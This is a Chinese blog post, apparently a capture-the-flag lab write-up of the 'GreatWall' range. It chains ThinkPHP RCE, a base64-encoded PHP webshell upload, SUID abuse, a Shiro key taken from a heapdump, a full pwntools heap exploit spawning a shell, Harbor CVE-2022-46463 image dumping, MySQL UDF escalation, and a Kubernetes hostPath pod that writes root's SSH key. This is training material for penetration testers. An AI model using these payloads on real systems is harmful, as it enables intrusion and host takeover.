{"id":988,"date":"2025-04-19T23:05:33","date_gmt":"2025-04-19T15:05:33","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=988"},"modified":"2025-05-01T11:22:43","modified_gmt":"2025-05-01T03:22:43","slug":"cqyj_greatwall","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2025\/04\/19\/cqyj_greatwall\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-GreatWall"},"content":{"rendered":"

\u957f\u57ce\u676f<\/h2>\n

\u6d89\u53ca\u7684\u77e5\u8bc6\u70b9<\/p>\n

thinkphp v5.0.23 RCE\n\u8681\u5251disable_functions\u7ed5\u8fc7\nbase32\u7684suid\u63d0\u6743\nheapdump\u6cc4\u9732shiroKey\n\u5806 UAF\u6f0f\u6d1e\nHarbor\u672a\u6388\u6743\u8bbf\u95ee\uff08CVE-2022-46463\uff09\nmysql UDF\u63d0\u6743\nk8s Api Server\u672a\u6388\u6743<\/code><\/pre>\n
flag1\uff08\u5165\u53e3\u673a \/ 172.28.23.17\uff09<\/h3>\n
fscan\u626b\u5230tp5 rce<\/p>\n
start infoscan\n8.130.128.177:80 open\n8.130.128.177:8080 open\n8.130.128.177:22 open\n[*] alive ports len is: 3\nstart vulscan\n[*] WebTitle http:\/\/8.130.128.177      code:200 len:10887  title:""\n[*] WebTitle http:\/\/8.130.128.177:8080 code:200 len:1027   title:Login Form\n[+] PocScan http:\/\/8.130.128.177:8080 poc-yaml-thinkphp5023-method-rce poc1<\/code><\/pre>\n
thinkphp v5.0.23 RCE<\/h4>\n
\/index.php?s=captcha\n\n_method=__construct&filter[]=system&method=GET&get[]=whoami<\/code><\/pre>\n
\"greatWall_1\"<\/p>\n
\u4e00\u53e5\u8bdd\u4e0a\u7ebf\uff0c\u6839\u76ee\u5f55\u62ff\u5230flag1<\/p>\n
\"greatWall_2\"<\/p>\n
flag2\uff08172.28.23.26 \/ 172.28.14.6\uff09<\/h3>\n
\u4f20Stowaway\u8ddffscan\uff0c\u626b172.28.23<\/code>\u6bb5\uff08\u6253\u4e86\u4e24\u904d\u53d1\u73b0\u591a\u5c42\u5185\u7f51\u8fd8\u662f\u8981\u642d\u6b63\u5411\u4ee3\u7406\uff0c\u4e0d\u7136\u540e\u7eed\u9776\u673a\u4e0a\u7ebf\u6bd4\u8f83\u9ebb\u70e6\uff09<\/p>\n
(icmp) Target 172.28.23.33    is alive\n(icmp) Target 172.28.23.26    is alive\n(icmp) Target 172.28.23.17    is alive\n[*] Icmp alive hosts len is: 3\n172.28.23.17:8080 open\n172.28.23.26:22 open\n172.28.23.33:22 open\n172.28.23.26:21 open\n172.28.23.26:80 open\n172.28.23.17:80 open\n172.28.23.17:22 open\n172.28.23.33:8080 open\n[*] alive ports len is: 8\nstart vulscan\n[*] WebTitle http:\/\/172.28.23.17       code:200 len:10887  title:""\n[*] WebTitle http:\/\/172.28.23.17:8080  code:200 len:1027   title:Login Form\n[*] WebTitle http:\/\/172.28.23.26       code:200 len:13693  title:\u65b0\u7fd4OA\u7ba1\u7406\u7cfb\u7edf-OA\u7ba1\u7406\u5e73\u53f0\u8054\u7cfb\u7535\u8bdd\uff1a13849422648\u5fae\u4fe1\u540c\u53f7\uff0cQQ958756413\n[+] ftp 172.28.23.26:21:anonymous \n   [->]OASystem.zip\n[*] WebTitle http:\/\/172.28.23.33:8080  code:302 len:0      title:None \u8df3\u8f6curl: http:\/\/172.28.23.33:8080\/login;jsessionid=5D4B779E04DC95A879AED54DB1AE95A9\n[*] WebTitle http:\/\/172.28.23.33:8080\/login;jsessionid=5D4B779E04DC95A879AED54DB1AE95A9 code:200 len:3860   title:\u667a\u8054\u79d1\u6280 ERP \u540e\u53f0\u767b\u9646\n[+] PocScan http:\/\/172.28.23.17:8080 poc-yaml-thinkphp5023-method-rce poc1\n[+] PocScan http:\/\/172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file \n[+] PocScan http:\/\/172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2<\/code><\/pre>\n
172.28.23.26<\/code>\u4e3b\u673a\u6709\u4e2aftp\u533f\u540d\u8bbf\u95ee\uff0c\u80fd\u4e0bweb\u6e90\u7801<\/p>\n
\"greatWall_3\"<\/p>\n
\u6839\u76ee\u5f55\u6709uploadbase64.php<\/code>\uff0c\u4f1a\u5339\u914ddata:image\/<input1>;base64,<input2><\/code>\uff0c\u4ee5<input1><\/code>\u4f5c\u4e3a\u6587\u4ef6\u540e\u7f00\uff0cbase64_decode(<input2>\uff09<\/code>\u4f5c\u4e3a\u6587\u4ef6\u5185\u5bb9\u5199\u5165<\/p>\n
<?php\n$img = $_POST['imgbase64'];\nif (preg_match('\/^(data:\\s*image\\\/(\\w+);base64,)\/', $img, $result)) {\n    $type = ".".$result[2];\n    $path = "upload\/" . date("Y-m-d") . "-" . uniqid() . $type;\n}\n$img =  base64_decode(str_replace($result[1], '', $img));\n@file_put_contents($path, $img);\nexit('{"src":"'.$path.'"}');<\/code><\/pre>\n
\u6293\u5305\u4f20\u5165<\/p>\n
POST \/uploadbase64.php HTTP\/1.1\nHost: 172.28.23.26\nPragma: no-cache\nCache-Control: no-cache\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/126.0.0.0 Safari\/537.36 Edg\/126.0.0.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\nConnection: close\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 76\n\nimgbase64=data:image\/php;base64,PD89YCRfR0VUWzFdYDtldmFsKCRfUE9TVFsxXSk7Pz4=<\/code><\/pre>\n
\"greatWall_4\"<\/p>\n
\u8bbf\u95eehttp:\/\/172.28.23.26\/upload\/2025-04-10-67f781c8935cf.php<\/code>\uff0c\u80fd\u6267\u884cphpinfo\uff0c\u4f46\u662f\u8681\u5251\u8fde\u63a5\u540e\u6267\u884c\u547d\u4ee4\u663e\u793aret=127\uff0c\u8bf4\u660e\u6709disable_functions<\/p>\n
\"greatWall_5\"<\/p>\n
\u8681\u5251disable_functions\u7ed5\u8fc7<\/h4>\n
\u5229\u7528\u81ea\u5e26\u63d2\u4ef6\u7ed5\u8fc7<\/p>\n
\"greatWall_6\"<\/p>\n
\u5728upload\u6587\u4ef6\u5939\u4e0a\u4f20\u4e00\u4e2aget\u4f20\u53c2\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u5728.antproxy.php<\/code>\u6587\u4ef6\u4e2d\u4fee\u6539\u8981\u5305\u542b\u7684\u6587\u4ef6\u540d<\/p>\n
\"greatWall_7\"<\/p>\n
\u80fd\u6210\u529f\u6267\u884c\u547d\u4ee4<\/p>\n
\"greatWall_8\"<\/p>\n
\u53cc\u7f51\u5361<\/p>\n
\"greatWall_9\"<\/p>\n
\u642d\u597d\u4ee3\u7406\u540e\u7eed\u8981\u7528\uff08\u6ce8\u610f\u8fd9\u91cc\u5982\u679c\u8981\u4e0a\u7ebf\u6216\u8005\u642d\u4ee3\u7406\uff0c\u6267\u884cchmod +x<\/code>\u65f6\uff0c+<\/code>\u8bb0\u5f97url\u7f16\u7801\uff09<\/p>\n
base32\u7684suid\u63d0\u6743<\/h4>\n
http:\/\/172.28.23.26\/upload\/.antproxy.php?1=system('find \/ -perm -u=s -type f 2>\/dev\/null');\n\n\/bin\/fusermount\n\/bin\/ping6\n\/bin\/mount\n\/bin\/su\n\/bin\/ping\n\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/at\n\/usr\/bin\/staprun\n\/usr\/bin\/base32\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/sudo\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/s-nail\/s-nail-privsep<\/code><\/pre>\n
http:\/\/172.28.23.26\/upload\/.antproxy.php?1=system('base32 \/flag02.txt');<\/code><\/pre>\n
\"greatWall_10\"<\/p>\n
flag3\uff08172.28.23.33 \/ 172.22.10.16\uff09<\/h3>\n
\u524d\u9762\u8fd8\u626b\u51fa172.28.23.33<\/code>\u4e3b\u673a\u6709heapdump\u6cc4\u9732\uff0c\u8001\u5957\u8def<\/p>\n
heapdump\u6cc4\u9732shiroKey<\/h4>\n
JDumpSpider\u5206\u6790heapdump\u62ff\u5230Shirokey<\/p>\n
===========================================\nCookieRememberMeManager(ShiroKey)\n-------------\nalgMode = GCM, key = AZYyIgMYhG6\/CzIJlvpR2g==, algName = AES\n\n===========================================<\/code><\/pre>\n
\"greatWall_12\"<\/p>\n
\u6ce8\u5165\u51b0\u874e\u5185\u5b58\u9a6c\uff0c\u63a5\u7740\u4f20\u6b63\u5411\u9a6c\u4e0a\u7ebf\uff0c\u4e5f\u662f\u53cc\u7f51\u5361\uff08\u8fd8\u53ef\u4ee5\u901a\u8fc7\u5165\u53e3\u673a\u4ee3\u7406\u4f20\u53cd\u5411\u9a6c\u4e0a\u7ebf\uff0c\u4ee3\u7406ip\u8981\u586b\u5185\u7f51ip\uff09<\/p>\n
\"greatWall_13\"<\/p>\n
\u5806 UAF\u6f0f\u6d1e<\/h4>\n
\/home\/ops01<\/code>\u4e0b\u6709\u4e2aHashNote\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0cpwn\u670d\u52a1\u4e00\u822c\u90fd\u5f00\u5728\u9ad8\u7aef\u53e3\uff0c\u4f20fscan\u626b\u672c\u5730ip\uff0c\u770b\u523059696\u7aef\u53e3\u5f00\u653e<\/p>\n
\"greatWall_14\"<\/p>\n
\u4e0d\u61c2pwn\uff0c\u76f4\u63a5kali\u6267\u884cexp\uff09<\/p>\n
from pwn import *\ncontext.arch='amd64'\n\ndef add(key,data='b'):\n    p.sendlineafter(b'Option:',b'1')\n    p.sendlineafter(b'Key:',key)\n    p.sendlineafter(b'Data:',data)\n\ndef show(key):\n    p.sendlineafter(b'Option:',b'2')\n    p.sendlineafter(b"Key: ",key);\n\ndef edit(key,data):\n    p.sendlineafter(b'Option:',b'3')\n    p.sendlineafter(b'Key:',key)\n    p.sendlineafter(b'Data:',data)\n\ndef name(username):\n    p.sendlineafter(b'Option:',b'4')\n    p.sendlineafter(b'name:',username)\n\np = remote('172.28.23.33', 59696)\n# p = process('.\/HashNote')\n\nusername=0x5dc980\nstack=0x5e4fa8\nukey=b'\\x30'*5+b'\\x31'+b'\\x44'\n\nfake_chunk=flat({\n    0:username+0x10,\n    0x10:[username+0x20,len(ukey),\\\n        ukey,0],\n    0x30:[stack,0x10]\n    },filler=b'\\x00')\n\np.sendlineafter(b'name',fake_chunk)\np.sendlineafter(b'word','freep@ssw0rd:3')\n\nadd(b'\\x30'*1+b'\\x31'+b'\\x44',b'test')   # 126\nadd(b'\\x30'*2+b'\\x31'+b'\\x44',b'test')   # 127\n\nshow(ukey)\nmain_ret=u64(p.read(8))-0x1e0\n\nrdi=0x0000000000405e7c # pop rdi ; ret\nrsi=0x000000000040974f # pop rsi ; ret\nrdx=0x000000000053514b # pop rdx ; pop rbx ; ret\nrax=0x00000000004206ba # pop rax ; ret\nsyscall=0x00000000004560c6 # syscall\n\nfake_chunk=flat({\n    0:username+0x20,\n    0x20:[username+0x30,len(ukey),\\\n        ukey,0],\n    0x40:[main_ret,0x100,b'\/bin\/sh\\x00']\n    },filler=b'\\x00')\n\nname(fake_chunk.ljust(0x80,b'\\x00'))\n\npayload=flat([\n    rdi,username+0x50,\n    rsi,0,\n    rdx,0,0,\n    rax,0x3b,\n    syscall\n    ])\n\np.sendlineafter(b'Option:',b'3')\np.sendlineafter(b'Key:',ukey)\np.sendline(payload)\np.sendlineafter(b'Option:',b'9')\np.interactive()<\/code><\/pre>\n
\u62ff\u5230\u7b2c\u4e09\u4e2aflag<\/p>\n
\"greatWall_15\"<\/p>\n
flag5\uff08172.22.14.46\uff09<\/h3>\n
\u56de\u5230172.28.23.26 <\/code>\u4e3b\u673a\uff0c\u626b172.22.14<\/code>\u6bb5<\/p>\n
(icmp) Target 172.22.14.6     is alive\n(icmp) Target 172.22.14.37    is alive\n(icmp) Target 172.22.14.46    is alive\n[*] Icmp alive hosts len is: 3\n172.22.14.6:80 open\n172.22.14.46:80 open\n172.22.14.46:22 open\n172.22.14.37:22 open\n172.22.14.6:22 open\n172.22.14.6:21 open\n172.22.14.37:2379 open\n172.22.14.37:10250 open\n[*] alive ports len is: 8\nstart vulscan\n[*] WebTitle http:\/\/172.22.14.46       code:200 len:785    title:Harbor\n[*] WebTitle http:\/\/172.22.14.6        code:200 len:13693  title:\u65b0\u7fd4OA\u7ba1\u7406\u7cfb\u7edf-OA\u7ba1\u7406\u5e73\u53f0\u8054\u7cfb\u7535\u8bdd\uff1a13849422648\u5fae\u4fe1\u540c\u53f7\uff0cQQ958756413\n[+] InfoScan http:\/\/172.22.14.46       [Harbor] \n[*] WebTitle https:\/\/172.22.14.37:10250 code:404 len:19     title:None\n[+] ftp 172.22.14.6:21:anonymous \n   [->]OASystem.zip\n[+] PocScan http:\/\/172.22.14.46\/swagger.json poc-yaml-swagger-ui-unauth [{path swagger.json}]<\/code><\/pre>\n
Harbor\u672a\u6388\u6743\u62c9\u53d6\u955c\u50cf<\/h4>\n
\u6709\u4e2aHarbor\u670d\u52a1\uff0c\u5c1d\u8bd5\u6253cve-2022-46463<\/a><\/p>\n
python3 harbor.py http:\/\/172.22.14.46\/<\/code><\/pre>\n
\"greatWall_16\"<\/p>\n
\u62c9harobor\/secret<\/code>\u955c\u50cf<\/p>\n
python3 harbor.py http:\/\/172.22.14.46\/ --dump harbor\/secret --v2<\/code><\/pre>\n
\"greatWall_17\"<\/p>\n
\u5728\u5176\u4e2d\u4e00\u4e2a\u6587\u4ef6\u5939\u770b\u5230\u7b2c\u4e94\u4e2aflag<\/p>\n
\"greatWall_18\"<\/p>\n
flag6\uff08172.22.10.28\uff09<\/h3>\n
\u518d\u62c9project\/projectadmin<\/code>\uff0c\u6709\u4e2ajar\u5305<\/p>\n
python3 harbor.py http:\/\/172.22.14.46\/ --dump project\/projectadmin --v2<\/code><\/pre>\n
\"greatWall_19\"<\/p>\n
mysql UDF\u63d0\u6743<\/h4>\n
\u5728application.properties\u770b\u5230172.22.10.28<\/code>\u4e3b\u673a\u7684mysql\u8d26\u5bc6<\/p>\n
\"greatWall_20\"<\/p>\n
\u5728172.28.23.33<\/code>\u4e3b\u673a\u642d\u597d\u4ee3\u7406\uff0cMDUT\u8fde\u63a5<\/p>\n
\"greatWall_21\"<\/p>\n
\u5229\u7528UDF\u63d0\u6743\u529f\u80fd\u4e00\u628a\u68ad<\/p>\n
\"greatWall_22\"<\/p>\n
flag5\uff08172.22.14.37\uff09<\/h3>\n
\u524d\u9762\u626b172.22.14<\/code>\u6bb5\u626b\u51fa\u676510250\u7aef\u53e3\uff0c\u8fd9\u4e2a\u7aef\u53e3\u662fk8s\u4e2dkubelet<\/code>\u4e0eapiserver <\/code>\u901a\u4fe1\u7684\u7aef\u53e3\uff0c\u6302\u4ee3\u7406\u8bbf\u95ee6443\u7aef\u53e3\u53ef\u4ee5\u770b\u5230\u6240\u6709\u7684api\u63a5\u53e3<\/p>\n
k8s Api Server\u672a\u6388\u6743<\/h4>\n
\u5b66\u7740\u6253\uff0c\u521b\u5efa\u4e00\u4e2a\u6076\u610f\u7684yaml\u6587\u4ef6<\/p>\n
apiVersion: apps\/v1\nkind: Deployment\nmetadata:\n  name: nginx-deployment\n  labels:\n    app: nginx\nspec:\n  replicas: 1\n  selector:\n    matchLabels:\n      app: nginx\n  template:\n    metadata:\n      labels:\n        app: nginx\n    spec:\n      containers:\n      - name: nginx\n        image: nginx:1.8\n        volumeMounts:\n        - mountPath: \/mnt\n          name: test-volume\n      volumes:\n      - name: test-volume\n        hostPath:\n          path: \/<\/code><\/pre>\n
\u521b\u5efapod\uff0c\u7528\u6237\u5bc6\u7801\u968f\u4fbf\u586b<\/p>\n
kubectl.exe --insecure-skip-tls-verify -s https:\/\/172.22.14.37:6443\/ apply -f evil.yaml<\/code><\/pre>\n
\u5217\u51fapod<\/p>\n
kubectl.exe --insecure-skip-tls-verify -s https:\/\/172.22.14.37:6443\/ get pods -n default<\/code><\/pre>\n
\u80fd\u770b\u5230\u5bb9\u5668\u540d\u4e3anginx-deployment-864f8bfd6f-fr57q<\/code>\uff0c\u53ef\u4ee5\u50cfdocker\u90a3\u6837\u8fdb\u5165\u5bb9\u5668<\/p>\n
kubectl.exe --insecure-skip-tls-verify -s https:\/\/172.22.14.37:6443\/ exec -it nginx-deployment-864f8bfd6f-fr57q \/bin\/bash<\/code><\/pre>\n
\u56e0\u4e3a\u524d\u9762yaml\u6587\u4ef6\u6307\u5b9a\u4e86\u5bbf\u4e3b\u673a\u6302\u8f7d\u76ee\u5f55\u4e3a\/mnt<\/code>\uff0c\u56e0\u6b64\u53ef\u4ee5\u76f4\u63a5\u5199ssh\u516c\u94a5\u5230\/mnt\/root\/.ssh\/authorized_keys<\/code><\/p>\n
echo "ssh-rsa AAAA...Q== root@kali" > \/mnt\/root\/.ssh\/authorized_keys<\/code><\/pre>\n
\"greatWall_23\"<\/p>\n
ssh\u516c\u94a5\u8fde\u63a5172.22.14.37<\/code>\u4e3b\u673a\uff0cmysql\u5f31\u5bc6\u7801\u8fdb\u5165\uff0c\u5728flaghaha<\/code>\u6570\u636e\u5e93\u62ff\u6700\u540e\u4e00\u4e2aflag<\/p>\n
\u250c\u2500\u2500(root\ud83d\udc80kali)-[~\/.ssh]\n\u2514\u2500# proxychains4 -q ssh root@172.22.14.37 \nThe authenticity of host '172.22.14.37 (172.22.14.37)' can't be established.\nED25519 key fingerprint is SHA256:m3+H5Mqvie3hsr4ANYqsMgb8NeW9PAIlC3xtR3zP7do.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added '172.22.14.37' (ED25519) to the list of known hosts.\n\nroot@ubuntu-k8s:~# mysql -uroot -proot\n\nmysql> show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| flaghaha           |\n| mysql              |\n| performance_schema |\n| sys                |\n+--------------------+\n5 rows in set (0.01 sec)\n\nmysql> use flaghaha\n\nDatabase changed, 3 warnings\nmysql> show tables\n    -> ;\n+--------------------+\n| Tables_in_flaghaha |\n+--------------------+\n| flag04             |\n+--------------------+\n1 row in set (0.00 sec)\n\nmysql> select * from flag04;\n+------+--------------------------------------------------------------+\n| id   | f1agggggishere                                               |\n+------+--------------------------------------------------------------+\n|    1 | ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg== |\n+------+--------------------------------------------------------------+\n<\/code><\/pre>\n
flag{da69c459-7fe5-4535-b8d1-15fff496a29f}<\/code><\/pre>\n
<\/div>","protected":false},"excerpt":{"rendered":"
\u957f\u57ce\u676f \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 thinkphp v5.0.23 RCE \u8681\u5251disable_functions\u7ed5\u8fc7 b […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-988","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":1281,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/988","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=988"}],"version-history":[{"count":2,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/988\/revisions"}],"predecessor-version":[{"id":1005,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/988\/revisions\/1005"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=988"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=988"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=988"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}